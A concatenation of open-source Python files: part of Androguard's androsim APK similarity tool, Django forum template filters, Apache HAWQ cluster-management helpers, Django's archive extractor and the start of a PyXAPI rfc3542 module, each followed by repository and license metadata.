from elsim.elsim_dalvik import ProxyDalvikStringMultiple, ProxyDalvikStringOne, FILTERS_DALVIK_SIM_STRING
option_0 = { 'name' : ('-i', '--input'), 'help' : 'file : use these filenames', 'nargs' : 2 }
option_1 = { 'name' : ('-t', '--threshold'), 'help' : 'specify the threshold (0.0 to 1.0) to know if a method is similar. This option will impact on the filtering method. Because if you specify a higher value of the threshold, you will have more associations', 'nargs' : 1 }
option_2 = { 'name' : ('-c', '--compressor'), 'help' : 'specify the compressor (BZ2, ZLIB, SNAPPY, LZMA, XZ). The final result depends directly of the type of compressor. But if you use LZMA for example, the final result will be better, but it take more time', 'nargs' : 1 }
option_4 = { 'name' : ('-d', '--display'), 'help' : 'display all information about methods', 'action' : 'count' }
option_5 = { 'name' : ('-n', '--new'), 'help' : 'calculate the final score only by using the ratio of included methods', 'action' : 'count' }
option_6 = { 'name' : ('-e', '--exclude'), 'help' : 'exclude specific class name (python regexp)', 'nargs' : 1 }
option_7 = { 'name' : ('-s', '--size'), 'help' : 'exclude specific method below the specific size (specify the minimum size of a method to be used (it is the length (bytes) of the dalvik method)', 'nargs' : 1 }
option_8 = { 'name' : ('-x', '--xstrings'), 'help' : 'display similarities of strings', 'action' : 'count' }
option_9 = { 'name' : ('-v', '--version'), 'help' : 'version of the API', 'action' : 'count' }
option_10 = { 'name' : ('-l', '--library'), 'help' : 'use python library (python) or specify the path of the shared library)', 'nargs' : 1 }
options = [option_0, option_1, option_2, option_4, option_5, option_6, option_7, option_8, option_9, option_10]
def check_one_file(a, d1, dx1, FS, threshold, file_input, view_strings=False, new=True, library=True) :
d2 = None
ret_type = androconf.is_android( file_input )
if ret_type == "APK" :
a = apk.APK( file_input )
d2 = dvm.DalvikVMFormat( a.get_dex() )
elif ret_type == "DEX" :
d2 = dvm.DalvikVMFormat( open(file_input, "rb").read() )
if d2 == None :
return
dx2 = analysis.VMAnalysis( d2 )
el = elsim.Elsim( ProxyDalvik(d1, dx1), ProxyDalvik(d2, dx2), FS, threshold, options.compressor, libnative=library )
el.show()
print "\t--> methods: %f%% of similarities" % el.get_similarity_value(new)
if options.display :
print "SIMILAR methods:"
diff_methods = el.get_similar_elements()
for i in diff_methods :
el.show_element( i )
print "IDENTICAL methods:"
new_methods = el.get_identical_elements()
for i in new_methods :
el.show_element( i )
print "NEW methods:"
new_methods = el.get_new_elements()
for i in new_methods :
el.show_element( i, False )
print "DELETED methods:"
del_methods = el.get_deleted_elements()
for i in del_methods :
el.show_element( i )
print "SKIPPED methods:"
skipped_methods = el.get_skipped_elements()
for i in skipped_methods :
el.show_element( i )
if view_strings :
els = elsim.Elsim( ProxyDalvikStringMultiple(d1, dx1),
ProxyDalvikStringMultiple(d2, dx2),
FILTERS_DALVIK_SIM_STRING,
threshold,
options.compressor,
libnative=library )
#els = elsim.Elsim( ProxyDalvikStringOne(d1, dx1),
# ProxyDalvikStringOne(d2, dx2), FILTERS_DALVIK_SIM_STRING, threshold, options.compressor, libnative=library )
els.show()
print "\t--> strings: %f%% of similarities" % els.get_similarity_value(new)
if options.display :
print "SIMILAR strings:"
diff_strings = els.get_similar_elements()
for i in diff_strings :
els.show_element( i )
print "IDENTICAL strings:"
new_strings = els.get_identical_elements()
for i in new_strings :
els.show_element( i )
print "NEW strings:"
new_strings = els.get_new_elements()
for i in new_strings :
els.show_element( i, False )
print "DELETED strings:"
del_strings = els.get_deleted_elements()
for i in del_strings :
els.show_element( i )
print "SKIPPED strings:"
skipped_strings = els.get_skipped_elements()
for i in skipped_strings :
els.show_element( i )
def check_one_directory(a, d1, dx1, FS, threshold, directory, view_strings=False, new=True, library=True) :
for root, dirs, files in os.walk( directory, followlinks=True ) :
if files != [] :
for f in files :
real_filename = root
if real_filename[-1] != "/" :
real_filename += "/"
real_filename += f
print "filename: %s ..." % real_filename
check_one_file(a, d1, dx1, FS, threshold, real_filename, view_strings, new, library)
############################################################
def main(options, arguments) :
if options.input != None :
a = None
ret_type = androconf.is_android( options.input[0] )
if ret_type == "APK" :
a = apk.APK( options.input[0] )
d1 = dvm.DalvikVMFormat( a.get_dex() )
elif ret_type == "DEX" :
d1 = dvm.DalvikVMFormat( open(options.input[0], "rb").read() )
dx1 = analysis.VMAnalysis( d1 )
threshold = None
if options.threshold != None :
threshold = float(options.threshold)
FS = FILTERS_DALVIK_SIM
FS[elsim.FILTER_SKIPPED_METH].set_regexp( options.exclude )
FS[elsim.FILTER_SKIPPED_METH].set_size( options.size )
new = True
if options.new != None :
new = False
library = True
if options.library != None :
library = options.library
if options.library == "python" :
library = False
if os.path.isdir( options.input[1] ) == False :
check_one_file( a, d1, dx1, FS, threshold, options.input[1], options.xstrings, new, library )
else :
check_one_directory(a, d1, dx1, FS, threshold, options.input[1], options.xstrings, new, library )
elif options.version != None :
print "Androsim version %s" % androconf.ANDROGUARD_VERSION
if __name__ == "__main__" :
parser = OptionParser()
for option in options :
param = option['name']
del option['name']
parser.add_option(*param, **option)
options, arguments = parser.parse_args()
sys.argv[:] = arguments
main(options, arguments)
| apache-2.0 |
Liubusy/V2GO | forum/templatetags/forum_extras.py | 7 | 5807 | # coding: utf-8
'''
Django模板引擎的自定义过滤器,需要在模板中引用
{% load forum_extras %}
'''
import json, re, random
from datetime import date, datetime
from django import template
from django.utils import timezone
from markdown import markdown
register = template.Library()
@register.filter(name='dump_errors')
def dump_errors(errors): # 显示错误信息
t = template.Template('''
{% if errors %}
<ul class="errors alert alert-error">
{% for v in errors.itervalues %}
<li>{{ v | join:',' }}</li>
{% endfor %}
</ul>
{% endif %}
''')
c = template.Context(dict(errors = errors))
return t.render(c)
@register.simple_tag
def build_uri(uri, param, value): # 给uri添加参数或者修改参数的值
regx = re.compile('[\?&](%s=[^\?&]*)' % param)
find = regx.search(uri)
split = '&' if re.search(r'\?', uri) else '?'
if not find: return '%s%s%s=%s' % (uri, split, param, value)
return re.sub(find.group(1), '%s=%s' % (param, value), uri)
@register.simple_tag
def pagination(page, uri, list_rows = 10): # 显示分页
def gen_page_list(current_page = 1, total_page = 1, list_rows = 10):
if total_page <= list_rows:
return range(1, total_page + 1)
elif current_page <= (list_rows // 2):
return range(1, list_rows + 1)
elif current_page >= (total_page - list_rows // 2):
return range(total_page - list_rows + 1, total_page + 1)
else:
return range(current_page - list_rows // 2, current_page - list_rows // 2 + list_rows)
t = template.Template('''
{% load forum_extras %} {# 如果要使用自定义tag filter这里也需要加载 #}
{% if page and page.pages > 1 %}
<ul>
<li {% ifequal page.index page.prev %}class="disabled"{% endifequal %}><a href="{% build_uri uri 'p' page.prev %}">«</a></li>
{% for p in gen_page_list %}
<li {% ifequal page.index p %}class="active"{% endifequal %}>
{% ifnotequal page.index p %}
<a href="{% build_uri uri 'p' p %}">{{ p }}</a>
{% else %}
<a href="javascript:;">{{ p }}</a>
{% endifnotequal %}
</li>
{% endfor %}
<li {% ifequal page.index page.next %}class="disabled"{% endifequal %}><a href="{% build_uri uri 'p' page.next %}">»</a></li>
</ul>
{% endif %}
''')
c = template.Context(dict(page = page, uri = uri, gen_page_list = gen_page_list(page.index, page.pages, list_rows)))
return t.render(c)
@register.filter(name='pretty_date')
def pretty_date(time = None): # 输出时间,格式化的时间
'''
Get a datetime object or a int() Epoch timestamp and return a
pretty string like 'an hour ago', 'Yesterday', '3 months ago',
'just now', etc
'''
if time == None:
return time
now = timezone.now()
if isinstance(time, basestring):
time = datetime.strptime(time, '%Y-%m-%d %H:%M:%S')
elif isinstance(time, int):
diff = now - datetime.fromtimestamp(time)
elif isinstance(time, datetime):
diff = now - time
elif not time:
diff = now - now
second_diff = diff.seconds
day_diff = diff.days
if day_diff < 0:
return ''
if day_diff == 0:
if second_diff < 10:
return '刚刚'
if second_diff < 60:
return str(second_diff) + ' 秒前'
if second_diff < 120:
return '1 分钟前'
if second_diff < 3600:
return str(second_diff / 60) + ' 分钟前'
if second_diff < 7200:
return '1 小时前'
if second_diff < 86400:
return str(second_diff / 3600) + ' 小时前'
if day_diff == 1:
return '昨天'
if day_diff < 7:
return str(day_diff) + ' 天前'
if day_diff < 31:
return str(day_diff / 7) + ' 周前'
if day_diff < 365:
return str(day_diff / 30) + ' 月前'
return str(day_diff / 365) + ' 天前'
@register.filter(name='content_process')
def content_process(content): #内容处理,把gist,微博图片什么的替换为引用框架什么的
# render content included gist
content = re.sub(r'http(s)?:\/\/gist.github.com\/(\d+)(.js)?', r'<script src="http://gist.github.com/\2.js"></script>', content)
# render sinaimg pictures
content = re.sub(r'(http:\/\/\w+.sinaimg.cn\/.*?\.(jpg|gif|png))', r'<img src="\1" />', content)
# render @ mention links
content = re.sub(r'@(\w+)(\s|)', r'<a href="/u/\1/">@\1</a> ', content)
# render youku videos
content = re.sub(r'http://v.youku.com/v_show/id_(\w+).html', r'<iframe height=498 width=510 src="http://player.youku.com/embed/\1" frameborder=0 allowfullscreen style="width:100%;max-width:510px;"></iframe>', content)
return content
@register.filter(name='markdown')
def markdown_up(content): # 转为markdown
if not content:
return ''
return markdown(content, extensions = ['codehilite', 'fenced_code', 'mathjax'], safe_mode = 'escape')
@register.filter(name='email_mosaic')
def email_mosaic(email): # 隐藏email
if not email:
return ''
email_name = re.findall(r'^([^@]+)@', email)[0]
if len(email_name) < 5:
email_name = email_name + '***'
email = re.sub(r'^([^@]+)@', '%s@' % email_name, email)
else:
email = re.sub(r'[^@]{3}@', '***@', email)
return email
@register.simple_tag
def gen_random(): # 生成随机数用语静态文件,避免静态文件被浏览器缓存
return random.random()
| mit |
huor/incubator-hawq | tools/bin/hawqpylib/hawqlib.py | 5 | 20926 | #!/usr/bin/env python
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os, sys
import subprocess
import threading
import Queue
from xml.dom import minidom
from xml.etree.ElementTree import ElementTree
from pygresql.pg import DatabaseError
import shutil
from gppylib.db import dbconn
from gppylib.commands.base import WorkerPool, REMOTE
from gppylib.commands.unix import Echo
import re
class HawqCommands(object):
def __init__(self, function_list=None, name='HAWQ', action_name = 'execute', logger = None):
self.function_list = function_list
self.name = name
self.action_name = action_name
self.return_flag = 0
self.thread_list = []
if logger:
self.logger = logger
def get_function_list(self, function_list):
self.function_list = function_list
def exec_function(self, func, *args, **kwargs):
result = func(*args, **kwargs)
if result != 0 and self.logger and func.__name__ == 'remote_ssh':
self.logger.error("%s %s failed on %s" % (self.name, self.action_name, args[1]))
self.return_flag += result
def start(self):
self.thread_list = []
self.return_flag = 0
for func_dict in self.function_list:
if func_dict["args"]:
new_arg_list = []
new_arg_list.append(func_dict["func"])
for arg in func_dict["args"]:
new_arg_list.append(arg)
new_arg_tuple = tuple(new_arg_list)
t = threading.Thread(target=self.exec_function, args=new_arg_tuple, name=self.name)
else:
t = threading.Thread(target=self.exec_function, args=(func_dict["func"],), name=self.name)
self.thread_list.append(t)
for thread_instance in self.thread_list:
thread_instance.start()
#print threading.enumerate()
for thread_instance in self.thread_list:
thread_instance.join()
def batch_result(self):
return self.return_flag
class threads_with_return(object):
def __init__(self, function_list=None, name='HAWQ', action_name = 'execute', logger = None, return_values = None):
self.function_list = function_list
self.name = name
self.action_name = action_name
self.return_values = return_values
self.thread_list = []
self.logger = logger
def get_function_list(self, function_list):
self.function_list = function_list
def exec_function(self, func, *args, **kwargs):
result = func(*args, **kwargs)
if result != 0 and self.logger and func.__name__ == 'remote_ssh':
self.logger.error("%s %s failed on %s" % (self.name, self.action_name, args[1]))
self.return_values.put(result)
def start(self):
self.thread_list = []
for func_dict in self.function_list:
if func_dict["args"]:
new_arg_list = []
new_arg_list.append(func_dict["func"])
for arg in func_dict["args"]:
new_arg_list.append(arg)
new_arg_tuple = tuple(new_arg_list)
t = threading.Thread(target=self.exec_function, args=new_arg_tuple, name=self.name)
else:
t = threading.Thread(target=self.exec_function, args=(func_dict["func"],), name=self.name)
self.thread_list.append(t)
for thread_instance in self.thread_list:
thread_instance.start()
#print threading.enumerate()
for thread_instance in self.thread_list:
thread_instance.join()
def batch_result(self):
return self.return_values
def check_property_exist_xml(xml_file, property_name):
property_exist = False
property_value = ''
with open(xml_file) as f:
xmldoc = minidom.parse(f)
for node in xmldoc.getElementsByTagName('property'):
name, value = (node.getElementsByTagName('name')[0].childNodes[0].data,
node.getElementsByTagName('value')[0].childNodes[0].data)
if name == property_name:
property_exist = True
property_value = value
return property_exist, property_name, property_value
def get_xml_values(xmlfile):
xml_dict = {}
with open(xmlfile) as f:
xmldoc = minidom.parse(f)
for node in xmldoc.getElementsByTagName('property'):
name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
try:
value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
except:
value = None
xml_dict[name] = value
return xml_dict
class HawqXMLParser:
def __init__(self, GPHOME):
self.GPHOME = GPHOME
self.xml_file = "%s/etc/hawq-site.xml" % GPHOME
self.hawq_dict = {}
self.propertyValue = ""
def get_value_from_name(self, property_name):
with open(self.xml_file) as f:
xmldoc = minidom.parse(f)
for node in xmldoc.getElementsByTagName('property'):
name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
try:
value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
except:
value = ''
if name == property_name:
self.propertyValue = value
return self.propertyValue
def get_all_values(self):
with open(self.xml_file) as f:
xmldoc = minidom.parse(f)
for node in xmldoc.getElementsByTagName('property'):
name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
try:
value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
except:
value = ''
if value == '':
value == 'None'
self.hawq_dict[name] = value
if 'hawq_standby_address_host' in self.hawq_dict:
if self.hawq_dict['hawq_standby_address_host'].lower() in ['none', '', 'localhost']:
del self.hawq_dict['hawq_standby_address_host']
return None
def get_xml_doc(self):
with open(self.xml_file) as f:
xmldoc = minidom.parse(f)
return xmldoc
def check_hostname_equal(remote_host, user = ""):
cmd = "hostname"
result_local, local_hostname, stderr_remote = local_ssh_output(cmd)
result_remote, remote_hostname, stderr_remote = remote_ssh_output(cmd, remote_host, user)
if result_remote != 0:
print "Execute command '%s' failed with return code %d on %s." % (cmd, result_remote, remote_host)
print "Either ssh connection fails or command exits with error. Details:"
print stderr_remote
print "For ssh connection issue, please make sure passwordless ssh is enabled or check remote host."
sys.exit(result_remote)
if local_hostname.strip() == remote_hostname.strip():
return True
else:
return False
def check_hawq_running(host, data_directory, port, user = '', logger = None):
hawq_running = True
hawq_pid_file_path = data_directory + '/postmaster.pid'
if check_file_exist(hawq_pid_file_path, host, logger):
if not check_postgres_running(data_directory, user, host, logger):
if logger:
logger.warning("Have a postmaster.pid file but no hawq process running")
lockfile="/tmp/.s.PGSQL.%s" % port
if logger:
logger.info("Clearing hawq instance lock files and pid file")
cmd = "rm -rf %s %s" % (lockfile, hawq_pid_file_path)
remote_ssh(cmd, host, user)
hawq_running = False
else:
hawq_running = True
else:
if check_postgres_running(data_directory, user, host, logger):
if logger:
logger.warning("postmaster.pid file does not exist, but hawq process is running.")
hawq_running = True
else:
if logger:
logger.warning("HAWQ process is not running on %s, skip" % host)
hawq_running = False
return host, hawq_running
def local_ssh(cmd, logger = None, warning = False):
result = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
stdout,stderr = result.communicate()
if logger:
if stdout != '':
logger.info(stdout.strip())
if stderr != '':
if not warning:
logger.error(stderr.strip())
else:
logger.warn(stderr.strip())
return result.returncode
def local_ssh_output(cmd):
result = subprocess.Popen(cmd, shell=True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
stdout,stderr = result.communicate()
return (result.returncode, str(stdout.strip()), str(stderr.strip()))
def remote_ssh(cmd, host, user):
if user == "":
remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s \"%s\"" % (host, cmd)
else:
remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s@%s \"%s\"" % (user, host, cmd)
try:
result = subprocess.Popen(remote_cmd_str, shell=True).wait()
except subprocess.CalledProcessError:
print "Execute shell command on %s failed" % host
pass
return result
def remote_ssh_output(cmd, host, user):
if user == "":
remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s \"%s\"" % (host, cmd)
else:
remote_cmd_str = "ssh -o StrictHostKeyChecking=no %s@%s \"%s\"" % (user, host, cmd)
try:
result = subprocess.Popen(remote_cmd_str, shell=True, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
stdout,stderr = result.communicate()
except:
print "Execute shell command on %s failed" % host
pass
return (result.returncode, str(stdout.strip()), str(stderr.strip()))
def is_node_alive(host, user = '', logger = None):
result = remote_ssh('true', host, user)
if result != 0:
if logger:
logger.info("node %s is not alive" % host)
return False
else:
return True
def check_return_code(result, logger = None, error_msg = None, info_msg = None, exit_true = False):
'''Check shell command exit code.'''
if result != 0:
if error_msg and logger:
logger.error(error_msg)
sys.exit(1)
else:
if info_msg and logger:
logger.info(info_msg)
if exit_true:
sys.exit(0)
return result
def check_postgres_running(data_directory, user, host = 'localhost', logger = None):
cmd='ps -ef | grep postgres | grep %s | grep -v grep > /dev/null || exit 1;' % data_directory
result = remote_ssh(cmd, host, user)
if result == 0:
return True
else:
if logger:
logger.debug("postgres process is not running on %s" % host)
return False
def check_syncmaster_running(data_directory, user, host = 'localhost', logger = None):
cmd='ps -ef | grep gpsyncmaster | grep %s | grep -v grep > /dev/null || exit 1;' % data_directory
result = remote_ssh(cmd, host, user)
if result == 0:
return True
else:
if logger:
logger.debug("syncmaster process is not running on %s" % host)
return False
def check_file_exist(file_path, host = 'localhost', logger = None):
cmd = "if [ -f %s ]; then exit 0; else exit 1;fi" % file_path
result = remote_ssh(cmd, host, '')
if result == 0:
return True
else:
if logger:
logger.debug("%s not exist on %s." % (file_path, host))
return False
def check_file_exist_list(file_path, hostlist, user):
if user == "":
user = os.getenv('USER')
file_exist_host_list = {}
for host in hostlist:
result = remote_ssh("test -f %s;" % file_path, host, user)
if result == 0:
file_exist_host_list[host] = 'exist'
return file_exist_host_list
def check_directory_exist(directory_path, host, user):
if user == "":
user = os.getenv('USER')
cmd = "if [ ! -d %s ]; then mkdir -p %s; fi;" % (directory_path, directory_path)
result = remote_ssh("if [ ! -d %s ]; then mkdir -p %s; fi;" % (directory_path, directory_path), host, user)
if result == 0:
file_exist = True
else:
file_exist = False
return host, file_exist
def create_cluster_directory(directory_path, hostlist, user = '', logger = None):
if user == "":
user = os.getenv('USER')
create_success_host = []
create_failed_host = []
work_list = []
q = Queue.Queue()
for host in hostlist:
work_list.append({"func":check_directory_exist,"args":(directory_path, host, user)})
dir_creator = threads_with_return(name = 'HAWQ', action_name = 'create', logger = logger, return_values = q)
dir_creator.get_function_list(work_list)
dir_creator.start()
while not q.empty():
item = q.get()
if item[1] == True:
create_success_host.append(item[0])
else:
create_failed_host.append(item[0])
return create_success_host, create_failed_host
def parse_hosts_file(GPHOME):
host_file = "%s/etc/slaves" % GPHOME
host_list = list()
with open(host_file) as f:
hosts = f.readlines()
for host in hosts:
host = host.split("#",1)[0].strip()
if host:
host_list.append(host)
return host_list
def update_xml_property(xmlfile, property_name, property_value):
file_path, filename = os.path.split(xmlfile)
xmlfile_backup = os.path.join(file_path, '.bak.' + filename)
xmlfile_swap = os.path.join(file_path, '.swp.' + filename)
# Backup current xmlfile
shutil.copyfile(xmlfile, xmlfile_backup)
f_tmp = open(xmlfile_swap, 'w')
with open(xmlfile) as f:
xmldoc = minidom.parse(f)
with open(xmlfile) as f:
while 1:
line = f.readline()
if not line:
break
m = re.match('.*<configuration>.*', line)
if m:
line_1 = line.split('<configuration>')[0] + '<configuration>\n'
f_tmp.write(line_1)
break
else:
f_tmp.write(line)
count_num = 0
for node in xmldoc.getElementsByTagName('property'):
name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
try:
value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
except:
value = ''
try:
description = node.getElementsByTagName('description')[0].childNodes[0].data.encode('ascii')
except:
description = ''
if name == property_name:
value = property_value
count_num += 1
f_tmp.write(" <property>\n")
f_tmp.write(" <name>%s</name>\n" % name)
f_tmp.write(" <value>%s</value>\n" % value)
if description:
f_tmp.write(" <description>%s</description>\n" % description)
f_tmp.write(" </property>\n\n")
if count_num == 0:
f_tmp.write(" <property>\n")
f_tmp.write(" <name>%s</name>\n" % property_name)
f_tmp.write(" <value>%s</value>\n" % property_value)
f_tmp.write(" </property>\n\n")
f_tmp.write("</configuration>\n")
else:
f_tmp.write("</configuration>\n")
f_tmp.close
shutil.move(xmlfile_swap, xmlfile)
def remove_property_xml(property_name, xmlfile, quiet = False):
file_path, filename = os.path.split(xmlfile)
xmlfile_backup = os.path.join(file_path, '.bak.' + filename)
xmlfile_swap = os.path.join(file_path, '.swp.' + filename)
# Backup current xmlfile
shutil.copyfile(xmlfile, xmlfile_backup)
f_tmp = open(xmlfile_swap, 'w')
with open(xmlfile) as f:
xmldoc = minidom.parse(f)
with open(xmlfile) as f:
while 1:
line = f.readline()
if not line:
break
m = re.match('.*<configuration>.*', line)
if m:
line_1 = line.split('<configuration>')[0] + '<configuration>\n'
f_tmp.write(line_1)
break
else:
f_tmp.write(line)
for node in xmldoc.getElementsByTagName('property'):
name = node.getElementsByTagName('name')[0].childNodes[0].data.encode('ascii')
try:
value = node.getElementsByTagName('value')[0].childNodes[0].data.encode('ascii')
except:
value = ''
try:
description = node.getElementsByTagName('description')[0].childNodes[0].data.encode('ascii')
except:
description = ''
if name == property_name:
if not quiet:
print "Remove property %s" % property_name
else:
f_tmp.write(" <property>\n")
f_tmp.write(" <name>%s</name>\n" % name)
f_tmp.write(" <value>%s</value>\n" % value)
if description:
f_tmp.write(" <description>%s</description>\n" % description)
f_tmp.write(" </property>\n\n")
f_tmp.write("</configuration>\n")
f_tmp.close
shutil.move(xmlfile_swap, xmlfile)
def sync_hawq_site(GPHOME, host_list):
for node in host_list:
try:
# Print "Sync hawq-site.xml to %s." % node
os.system("scp %s/etc/hawq-site.xml %s:%s/etc/hawq-site.xml > /dev/null 2>&1" % (GPHOME, node, GPHOME))
except:
print ""
sys.exit("sync to node %s failed." % node)
return None
def get_hawq_hostname_all(master_port):
try:
dburl = dbconn.DbURL(port=master_port, dbname='template1')
conn = dbconn.connect(dburl, True)
query = "select role, status, port, hostname, address from gp_segment_configuration;"
rows = dbconn.execSQL(conn, query)
conn.close()
except DatabaseError, ex:
print "Failed to connect to database, this script can only be run when the database is up."
sys.exit(1)
seg_host_list = {}
master_host = ''
master_status = ''
standby_host = ''
standby_status = ''
for row in rows:
if row[0] == 'm':
master_host = row[3]
master_status = 'u'
elif row[0] == 's':
standby_host = row[3]
if row[1] == "u":
standby_status = "u"
else:
standby_status = "Unknown"
elif row[0] == 'p':
seg_host_list[row[3]] = row[1]
hawq_host_array = {'master': {master_host: master_status}, 'standby': {standby_host: standby_status}, 'segment': seg_host_list}
return hawq_host_array
def get_host_status(hostlist):
"""
Test if SSH command works on a host and return a dictionary
Return Ex: {host1: True, host2: False}
where True represents SSH command success and False represents failure
"""
if not isinstance(hostlist, list):
raise Exception("Input parameter should be of type list")
pool = WorkerPool(min(len(hostlist), 16))
for host in hostlist:
cmd = Echo('ssh test', '', ctxt=REMOTE, remoteHost=host)
pool.addCommand(cmd)
pool.join()
pool.haltWork()
host_status_dict = {}
for cmd in pool.getCompletedItems():
if not cmd.get_results().wasSuccessful():
host_status_dict[cmd.remoteHost] = False
else:
host_status_dict[cmd.remoteHost] = True
return host_status_dict
def exclude_bad_hosts(host_list):
"""
Split Hosts on which SSH works vs node on which it fails
"""
host_status_dict = get_host_status(host_list)
working_hosts = [host for host in host_status_dict.keys() if host_status_dict[host]]
bad_hosts = list(set(host_list) - set(working_hosts))
return working_hosts, bad_hosts
| apache-2.0 |
gladsonvm/haystackdemo | lib/python2.7/site-packages/django/utils/archive.py | 78 | 6642 | """
Based on "python-archive" -- http://pypi.python.org/pypi/python-archive/
Copyright (c) 2010 Gary Wilson Jr. <gary.wilson@gmail.com> and contributers.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from __future__ import with_statement
import os
import shutil
import sys
import tarfile
import zipfile
class ArchiveException(Exception):
"""
Base exception class for all archive errors.
"""
class UnrecognizedArchiveFormat(ArchiveException):
"""
Error raised when passed file is not a recognized archive format.
"""
def extract(path, to_path=''):
"""
Unpack the tar or zip file at the specified path to the directory
specified by to_path.
"""
Archive(path).extract(to_path)
class Archive(object):
"""
The external API class that encapsulates an archive implementation.
"""
def __init__(self, file):
self._archive = self._archive_cls(file)(file)
@staticmethod
def _archive_cls(file):
cls = None
if isinstance(file, basestring):
filename = file
else:
try:
filename = file.name
except AttributeError:
raise UnrecognizedArchiveFormat(
"File object not a recognized archive format.")
base, tail_ext = os.path.splitext(filename.lower())
cls = extension_map.get(tail_ext)
if not cls:
base, ext = os.path.splitext(base)
cls = extension_map.get(ext)
if not cls:
raise UnrecognizedArchiveFormat(
"Path not a recognized archive format: %s" % filename)
return cls
def extract(self, to_path=''):
self._archive.extract(to_path)
def list(self):
self._archive.list()
class BaseArchive(object):
"""
Base Archive class. Implementations should inherit this class.
"""
def split_leading_dir(self, path):
path = str(path)
path = path.lstrip('/').lstrip('\\')
if '/' in path and (('\\' in path and path.find('/') < path.find('\\'))
or '\\' not in path):
return path.split('/', 1)
elif '\\' in path:
return path.split('\\', 1)
else:
return path, ''
def has_leading_dir(self, paths):
"""
Returns true if all the paths have the same leading path name
(i.e., everything is in one subdirectory in an archive)
"""
common_prefix = None
for path in paths:
prefix, rest = self.split_leading_dir(path)
if not prefix:
return False
elif common_prefix is None:
common_prefix = prefix
elif prefix != common_prefix:
return False
return True
def extract(self):
raise NotImplementedError
def list(self):
raise NotImplementedError
class TarArchive(BaseArchive):
def __init__(self, file):
self._archive = tarfile.open(file)
def list(self, *args, **kwargs):
self._archive.list(*args, **kwargs)
def extract(self, to_path):
# note: python<=2.5 doesnt seem to know about pax headers, filter them
members = [member for member in self._archive.getmembers()
if member.name != 'pax_global_header']
leading = self.has_leading_dir(members)
for member in members:
name = member.name
if leading:
name = self.split_leading_dir(name)[1]
filename = os.path.join(to_path, name)
if member.isdir():
if filename and not os.path.exists(filename):
os.makedirs(filename)
else:
try:
extracted = self._archive.extractfile(member)
except (KeyError, AttributeError):
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
print ("In the tar file %s the member %s is invalid: %s" %
(name, member.name, sys.exc_info()[1]))
else:
dirname = os.path.dirname(filename)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
with open(filename, 'wb') as outfile:
shutil.copyfileobj(extracted, outfile)
finally:
if extracted:
extracted.close()
class ZipArchive(BaseArchive):
def __init__(self, file):
self._archive = zipfile.ZipFile(file)
def list(self, *args, **kwargs):
self._archive.printdir(*args, **kwargs)
def extract(self, to_path):
namelist = self._archive.namelist()
leading = self.has_leading_dir(namelist)
for name in namelist:
data = self._archive.read(name)
if leading:
name = self.split_leading_dir(name)[1]
filename = os.path.join(to_path, name)
dirname = os.path.dirname(filename)
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
if filename.endswith(('/', '\\')):
# A directory
if not os.path.exists(filename):
os.makedirs(filename)
else:
with open(filename, 'wb') as outfile:
outfile.write(data)
extension_map = {
'.tar': TarArchive,
'.tar.bz2': TarArchive,
'.tar.gz': TarArchive,
'.tgz': TarArchive,
'.tz2': TarArchive,
'.zip': ZipArchive,
}
| mit |
metricube/PyXAPI | rfc3542.py | 1 | 4574 | #!/usr/bin/env python
# rfc3542.py: front end for `_rfc3542.so'
# Copyright (C) 2004 Yves Legrandgerard (ylg@pps.jussieu.fr)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from types import IntType, StringType
import struct
_have_rfc3542 = False
try:
import _rfc3542
from _rfc3542 import *
_have_rfc3542 = True
__doc__ = _rfc3542.__doc__
except ImportError:
pass
if _have_rfc3542:
class SocketOptionInteger(object):
""" internal class """
def __init__(self):
self.data = None
